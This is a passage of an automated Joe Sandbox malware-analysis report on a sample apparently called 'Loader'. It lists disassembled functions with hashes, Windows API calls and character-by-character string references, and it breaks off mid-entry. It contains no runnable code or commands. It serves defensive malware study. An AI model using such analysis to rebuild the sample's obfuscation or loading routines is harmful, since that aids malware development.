API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
Instruction ID: 61a3990d51287a321700371caea8ac95de16791a53993df06537a25f78a5eb73
Opcode Fuzzy Hash: fd517cc4091c0d14983317d9fc9f51e9ee4e013ad9cff62941fad828ef40864f
Instruction Fuzzy Hash: 5C01D674A98740DBD3708B189581AEBB7B5FBCA324F545B2DD0C593250D634D892CB8E

Function 00435F00 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 5939802b1301af77679c215306a21a7299ef6c9da27cc0b365f9f239b0c19f2f
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 6C110833B055D50EC3168D3C8400565BFA30AA7234F6D93DAF4B89B2D6D6278D8B8399

Function 00429E80 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
Instruction ID: a27733a69205e04c464837f65cce1e328396de0a29cbbd258d365049883dbe47
Opcode Fuzzy Hash: ae974aa015cb9a2e7ca8e05bc068c22be5d530372e1f024b1e298d7d6b666928
Instruction Fuzzy Hash: 7401B1F1B0031257DB20DF51A4C0727B2A9AF84708F4A453EE8485B382EB7DFC08C69A

Function 0042C89E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
Instruction ID: 94a2685e38f00eaf1eb05f0091b19f393d3aa0123d7ed6f17fd2bfd551075456
Opcode Fuzzy Hash: 41aecbbb57f341e3239aeda4c52079f99c77c3874fd3ef38ef81509e98e606fa
Instruction Fuzzy Hash: 9911E0727493000BE704CE3AA89016BFBE3AFD3214F2E983DD182C7725D93588078B4A

Function 004158FC Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
Instruction ID: fb47be4d804a9da23881eaf03f8acb819a2e87175e2b70562f1e2f5772406857
Opcode Fuzzy Hash: 7623d2961ef6c419805eac7e58d1c86d9daee92fdb993515a560874ec6750ddb
Instruction Fuzzy Hash: C30126B4664700DBEB248B259C51BB7B7A1E7CA334F541A2DE0C2A31A1C6249890CA1F

Function 00402B70 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
Instruction ID: 21743fce8f8fc89d95ce078a34e0e0e5e44fc2aba6199b741040941cf27e962f
Opcode Fuzzy Hash: 0ec352bbe4cbc42230a0051b4d6dd25082a105aad7c4e020716a29c2d8aeb373
Instruction Fuzzy Hash: 1CF0467B71821D0BD310DDA9FCC4577B3A6EBD5204B0A4139EA40A3381E8F4F80592A4

Function 0040B3BB Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
Instruction ID: 467d839b1f2edd79695e981d77696c97d4829d5b404480f02d90e7557cfed571
Opcode Fuzzy Hash: 17bcfa2246879958e6deeecfb3dd30fbf363363fe0cdfdf4ccd092ee3f1ec607
Instruction Fuzzy Hash: AD1192B09007029FE3649F19C899712FAB4BB06324F50978CE0695E6D2C3BAD589CFD5

Function 0043F286 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
Instruction ID: 01548a179f3559cfb04f008a038ad398e0644e2916ec8190e41f8619e0e1dcf3
Opcode Fuzzy Hash: 7745721efb1b8d97eb5a387c513d230e70c93acfe341ed94793c9456cf5d554e
Instruction Fuzzy Hash: FFE02BBAF480108B530CCF16D8505B073E2A3CB311704E03CD44AD7311C931DC12560D

Function 00417A75 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
Instruction ID: 71cc694b795eba117cf9378a5a53a8597336b0837f4540bad7c117c05afde082
Opcode Fuzzy Hash: 6e4e8af73efbfb209cfe09b31445d3bf69348074f3a3383892a69fec13abe48f
Instruction Fuzzy Hash: DDD05E359142049AC7008F2DA500919B7F0EBC7750F00A52DB448E72A9CB71C8019709

Function 00424F80 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
Instruction ID: d02d98b6c4407079e00ef93f935acfea29071d225d302e4f93154c128f20d5d8
Opcode Fuzzy Hash: 1e1811e256de978feef4c3cd29b6a07caae766e2687f34a7759ddec68fd786fd
Instruction Fuzzy Hash: FAB0127090C10087D504CF08C450470F378D747215F003418D00AB3102C310E800CA0C

Function 0043234E Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 161memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00432400

Strings

Y, xrefs: 00432483
i, xrefs: 0043241E
+, xrefs: 00432437
W, xrefs: 00432473
I, xrefs: 00432503
], xrefs: 004324A3
<, xrefs: 0043246B
U, xrefs: 00432463
O, xrefs: 00432533
/, xrefs: 00432423
C, xrefs: 004324D3
", xrefs: 004324CB
+, xrefs: 004325AB
=, xrefs: 00432366
I, xrefs: 0043237F
_, xrefs: 004324B3
G, xrefs: 004324F3
K, xrefs: 00432513
S, xrefs: 00432361
0, xrefs: 00432656
E, xrefs: 004324E3
=, xrefs: 0043235C
*, xrefs: 0043257B
4, xrefs: 0043245B
M, xrefs: 00432523
o, xrefs: 0043243C
[, xrefs: 00432493
A, xrefs: 004324C3
', xrefs: 0043254B
:, xrefs: 00432370
, xrefs: 0043242D
', xrefs: 0043255B
8, xrefs: 0043247B
k, xrefs: 00432428
Q, xrefs: 00432446
O, xrefs: 00432375
6, xrefs: 004325CB
S, xrefs: 00432453
", xrefs: 0043253B
H, xrefs: 0043237A
M, xrefs: 0043236B
m, xrefs: 00432432

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2525500382-871300800
Opcode ID: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
Instruction ID: cf4270bf8ffc7a5f823e8d7e11b60e879aec5e144cc898fab687690e48e742b5
Opcode Fuzzy Hash: ea0acaf6d4cacd1ba90045e13a6227656fbadf6fad3af0bdaba31410a1091882
Instruction Fuzzy Hash: 9291066150C7C1CDE3368638845879BBED11BA7218F088AADD5ED8B2D3C7BA4509CB67

Function 00432019 Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 159memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004320CE

Strings

O, xrefs: 00432043
S, xrefs: 0043202F
+, xrefs: 00432105
Q, xrefs: 00432114
A, xrefs: 00432191
', xrefs: 00432219
I, xrefs: 004321D1
6, xrefs: 00432299
O, xrefs: 00432201
m, xrefs: 00432100
=, xrefs: 0043202A
_, xrefs: 00432181
], xrefs: 00432171
K, xrefs: 004321E1
=, xrefs: 00432034
i, xrefs: 004320EC
8, xrefs: 00432149
U, xrefs: 00432131
Y, xrefs: 00432151
[, xrefs: 00432161
H, xrefs: 00432048
M, xrefs: 004321F1
C, xrefs: 004321A1
S, xrefs: 00432121
, xrefs: 004320FB
0, xrefs: 0043231B
", xrefs: 00432209
", xrefs: 00432199
E, xrefs: 004321B1
+, xrefs: 00432279
W, xrefs: 00432141
<, xrefs: 00432139
G, xrefs: 004321C1
:, xrefs: 0043203E
M, xrefs: 00432039
k, xrefs: 004320F6
*, xrefs: 00432249
o, xrefs: 0043210A
I, xrefs: 0043204D
/, xrefs: 004320F1
', xrefs: 00432229
4, xrefs: 00432129

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2525500382-871300800
Opcode ID: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
Instruction ID: 865d247f53da1c212b644144c37fe5ba321bca7ef231fb23b2e03194a57c13c3
Opcode Fuzzy Hash: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
Instruction Fuzzy Hash: 5C91E76110C7C18DE3368638885879BBED11BA7218F188A9DD1ED8B2D3C6BA454AC767

Function 00431512 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 97COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043151C
VariantInit.OLEAUT32 ref: 0043152F

Strings

p, xrefs: 004315BB
s, xrefs: 0043154D
c, xrefs: 004315B1
Z, xrefs: 00431593
n, xrefs: 0043157F
{, xrefs: 00431589
t, xrefs: 00431561
p, xrefs: 004315A7
a, xrefs: 0043156B
~, xrefs: 00431575
g, xrefs: 0043159D
w, xrefs: 00431557

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Z$a$c$g$n$p$p$s$t$w${$~
API String ID: 2610073882-3241135356
Opcode ID: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
Instruction ID: 5cfd81fbbfab52470edc20309123d5fdb3929ff031e16fa1184257613a9df237
Opcode Fuzzy Hash: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
Instruction Fuzzy Hash: 56412A7550D3C0CAE366CB28C49878FBFE26BD6308F58885CE5C50B396D6BA9509C763

Function 004329CE Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004329F3

Strings

p, xrefs: 00432A7F
s, xrefs: 00432A11
c, xrefs: 00432A75
{, xrefs: 00432A4D
n, xrefs: 00432A43
Z, xrefs: 00432A57
p, xrefs: 00432A6B
a, xrefs: 00432A2F
g, xrefs: 00432A61
~, xrefs: 00432A39
t, xrefs: 00432A25
w, xrefs: 00432A1B

Memory Dump Source

Source File: 00000003.00000002.3408802338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3408802338.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitVariant
String ID: Z$a$c$g$n$p$p$s$t$w${$~
API String ID: 1927566239-3241135356
Opcode ID: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
Instruction ID: 5e74e55bfebdbfff89dcf67c6b6cd9f6728498efe2e3599b3f27d88dd375cd61
Opcode Fuzzy Hash: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
Instruction Fuzzy Hash: 9D414F7150D3C0CEE366CB28C49874BBFE25BD6308F49889DE5C44B396C6BA9509C763

Function 00EDA1B2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00EDA19D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00EDA258
__alloca_probe_16.LIBCMT ref: 00EDA313
__alloca_probe_16.LIBCMT ref: 00EDA3A2
__freea.LIBCMT ref: 00EDA3ED
__freea.LIBCMT ref: 00EDA3F3
__freea.LIBCMT ref: 00EDA429
__freea.LIBCMT ref: 00EDA42F
__freea.LIBCMT ref: 00EDA43F

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 9437d009450964ab4d747c2ba5ea6eeecdea9248b8465ab401a2db4c31c43244
Instruction ID: c3a09560e5dd205b0bb28ccba162ac92b88e60e6f3c27bd95b2709011bd9b2ce
Opcode Fuzzy Hash: 9437d009450964ab4d747c2ba5ea6eeecdea9248b8465ab401a2db4c31c43244
Instruction Fuzzy Hash: 837125729002495BDF219F548C81BEF77EAEF49318F1C243AE814B7391E7769E028752

Function 00ECDC7B Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00ECDD01

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
Instruction ID: dfe99e928fffa7ce087e72066855be0913542b5df3b53f7f1dcc7a54e565ff07
Opcode Fuzzy Hash: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
Instruction Fuzzy Hash: 84B14472E083959FDB118F28CD81FEEBBA5EB55310F14516EE845BF282D2739902C7A0

Function 00EBF7F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00EBF827
___except_validate_context_record.LIBVCRUNTIME ref: 00EBF82F
_ValidateLocalCookies.LIBCMT ref: 00EBF8B8
__IsNonwritableInCurrentImage.LIBCMT ref: 00EBF8E3
_ValidateLocalCookies.LIBCMT ref: 00EBF938

Strings

csm, xrefs: 00EBF8CD

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f0d463cc1d970a5ce183dd58c4e54be952493032089278a322d49552bc6e7d11
Instruction ID: e7874163bac0d25dec843023d3e434a225053bf553999dfc1383cdef4f826a85
Opcode Fuzzy Hash: f0d463cc1d970a5ce183dd58c4e54be952493032089278a322d49552bc6e7d11
Instruction Fuzzy Hash: B841A530E00219ABCF14DF69CC85ADFBBE5AF45318F149166E815BB352D7319E06CB91

Function 00ECBD42 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00ECBE51,00EB35D2,?,00000000,?), ref: 00ECBE03

Strings

ext-ms-, xrefs: 00ECBDAD
api-ms-, xrefs: 00ECBD99

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
Instruction ID: 00f14e50d429b98270f2e89d429598dc420375b191302aa854fb6704c3708126
Opcode Fuzzy Hash: 82024604d199dd5cac31c9ad8ed3cf070c26331d34eebaf897184ee96ac08357
Instruction Fuzzy Hash: 9C210871A01259ABD7219B66EE82F9A3B589B01764F241128FD17BB2D0E731ED06C6D0

Function 00EBEB1C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EBEB22
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00EBEB30
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00EBEB41

Strings

GetSystemTimePreciseAsFileTime, xrefs: 00EBEB2A
kernel32.dll, xrefs: 00EBEB1D
GetTempPath2W, xrefs: 00EBEB36

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
Instruction ID: 02b8541b52e14a4af18aed91a861a8fe2e05a4671fe6c1a5b6d001abfb3adff9
Opcode Fuzzy Hash: 13ebe148e1869a1222839522e4d9cb0de1e1b452461a2ec04d62fd948c81ebe8
Instruction Fuzzy Hash: CDD05E759893E86F83109B73BC4E8963E94AB0426130104A9F409F61A0F3B008448B94

Function 00ED8A9C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6223e30dbf96786a927cebade01a899510bd37290a893096e08045bd365beb6
Instruction ID: fd396dc3e4292bec62739b69be470da07e33dc1a9d4aac697cae5adc33dc4fa8
Opcode Fuzzy Hash: d6223e30dbf96786a927cebade01a899510bd37290a893096e08045bd365beb6
Instruction Fuzzy Hash: 4AB1DF70A04249AFDB11DF98DA81BAEBBB5FF55314F14219AE404BB3D2CB719D42CB60

Function 00EC9AF4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B02
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EC9B10
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EC9B29
SetLastError.KERNEL32(00000000,00EC9AEB,00EBF5BA,00EBE585), ref: 00EC9B7B

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8e8dd99a4433173f9bf87e0e4a3aed09bc113c3852b85ad3e5f2b53a9aeb76da
Instruction ID: a643fd99d7d2b49e22ed043d91c10318c9c183ccf53924271e1ab802ce909cbf
Opcode Fuzzy Hash: 8e8dd99a4433173f9bf87e0e4a3aed09bc113c3852b85ad3e5f2b53a9aeb76da
Instruction Fuzzy Hash: 6B016833118A157EA6242675BDCDF1B2AA4EB117B8720133EF115793F2EE134C0B8148

Function 00ECA3BC Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00ECA4DB
CallUnexpected.LIBVCRUNTIME ref: 00ECA754

Strings

csm, xrefs: 00ECA512
csm, xrefs: 00ECA466
csm, xrefs: 00ECA3F9

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: ddeb69ec36410f7cf4b1d090e46ff505b6d113b2f8375d7e7ebd48cecc5291cf
Instruction ID: 1e976d904edde13338274e1108761c22d7285bb28f340d53cd405d065c560b75
Opcode Fuzzy Hash: ddeb69ec36410f7cf4b1d090e46ff505b6d113b2f8375d7e7ebd48cecc5291cf
Instruction Fuzzy Hash: D3B17C71800209DFCF18DFA4CA45EAEB7B5BF14308F18656EE8117B212D772D952CB92

Function 00EC4A89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00EC4A31,?,00EC4BE6,00000000), ref: 00EC4ABE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EC4AD0
FreeLibrary.KERNEL32(00000000,?,?,00000000,00EDB3E5,000000FF,?,00EC4B4A,00EC4A31,?,00EC4BE6,00000000), ref: 00EC4AF2

Strings

mscoree.dll, xrefs: 00EC4AB7
CorExitProcess, xrefs: 00EC4AC8

Memory Dump Source

